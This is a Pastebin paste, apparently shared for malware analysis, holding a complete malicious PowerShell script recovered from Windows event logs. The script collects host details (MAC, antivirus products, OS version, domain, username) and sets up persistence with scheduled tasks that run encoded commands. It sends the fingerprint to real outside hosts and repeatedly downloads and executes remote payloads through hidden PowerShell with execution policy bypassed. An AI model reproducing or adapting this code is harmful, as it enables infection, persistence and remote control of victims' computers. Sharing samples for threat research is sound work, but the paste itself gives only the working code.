Advertisement
dissectmalware

Malicious PowerShell

Aug 2nd, 2019
1,079
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Extracted from EventViewer (Event ID: 4104)
  2. [string]$av = ""
  3. [string]$avs = ""
  4. [string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
  5. $avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
  6. if($avs.GetType().name.IndexOf('Object') -gt -1){
  7.     for($v = 0; $v -lt $avs.Count; $v++){
  8.         $av += $avs[$v] + "|"
  9.     }
  10. }else{
  11. $av = $avs
  12. }
  13. try{
  14.     if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
  15.         $av += 'ZDFY'
  16.     }
  17. }catch{}
  18. if(-not ($mac -match '^[\da-fA-F-]*$')){
  19. [string]$mac = "00-00-00-00-00-00"
  20. }else{}
  21. [System.Threading.Thread]::Sleep((Get-Random -Minimum 20000 -Maximum 400000))
  22. $permit =  ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
  23. $status = '|'
  24. $path = "$env:temp\\kkk1.log"
  25. [string]$flag = test-path $path
  26. $path2 = "$env:temp\\kill.log"
  27. [string]$flag2 = test-path $path2
  28. try{
  29.     $name = 'Global\powerv5'
  30.     $psflag = $flase
  31.     New-Object System.Threading.Mutex ($true,$name,[ref]$psflag)
  32. }catch{}
  33. try{
  34.     $name2 = 'Global\powerdv5'
  35.     $dflag = $flase
  36.     New-Object System.Threading.Mutex ($true,$name2,[ref]$dflag)
  37. }catch{}
  38. $dt = Get-Date -Format 'yyMMdd'
  39. $key = "&mac="+$mac+"&av="+$av+"&version="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&PS=" + $psflag
  40. if($flag -eq 'False'){
  41.     New-Item $path -type file
  42.     try{
  43.         if($permit){
  44.             $status += 'PHig|'
  45.             $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h" + $dt + "')"
  46.             $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
  47.             $bcode = [Convert]::ToBase64String($Bytes)
  48.             $ccc = 'schtasks /query /tn "\Microsoft\windows\' + $mac + '" || schtasks /create /ru system /sc MINUTE /mo 45 /st 07:00:00 /tn "\Microsoft\windows\' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
  49.             &cmd.exe /c $ccc
  50.         }else{
  51.             $status += 'PLow|'
  52.             $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?l" + $dt + "')"
  53.             $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
  54.             $bcode = [Convert]::ToBase64String($Bytes)
  55.             $ccc = 'schtasks /query /tn "' + $mac + '" || schtasks /create /sc MINUTE /mo 45 /st 07:00:00 /tn "' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
  56.             &cmd.exe /c $ccc
  57.         }
  58.     }catch{}
  59. }else{}
  60. try{
  61.     $download = 'http://27.102.107.137/status.json?allv6' + $key + "&" + $status + "&" + $MyInvocation.MyCommand.Definition
  62.     IEX (New-Object Net.WebClient).DownloadString("$download")
  63. }catch{}
  64. try{
  65.     if($psflag){
  66.     $onps = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/newol.dat?allv6" + $key + "')" + '"'
  67.     Start-Process -FilePath cmd.exe -ArgumentList "$onps"
  68.     }else{}
  69. }catch{}
  70. try{
  71.     if([IntPtr]::Size -eq 8){
  72.         $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d64.dat?allv6" + $key + "')" + '"'
  73.     }else{
  74.         $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d32.dat?allv6" + $key + "')" + '"'
  75.     }
  76.     if($dflag){
  77.         Start-Process -FilePath cmd.exe -ArgumentList "$dglink"
  78.     }else{}
  79. }catch{}
  80. [System.Threading.Thread]::Sleep(3000)
  81. if($flag2 -eq 'False'){
  82.     New-Item $path2 -type file
  83.     Stop-Process -Force -processname powershell
  84. }else{}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement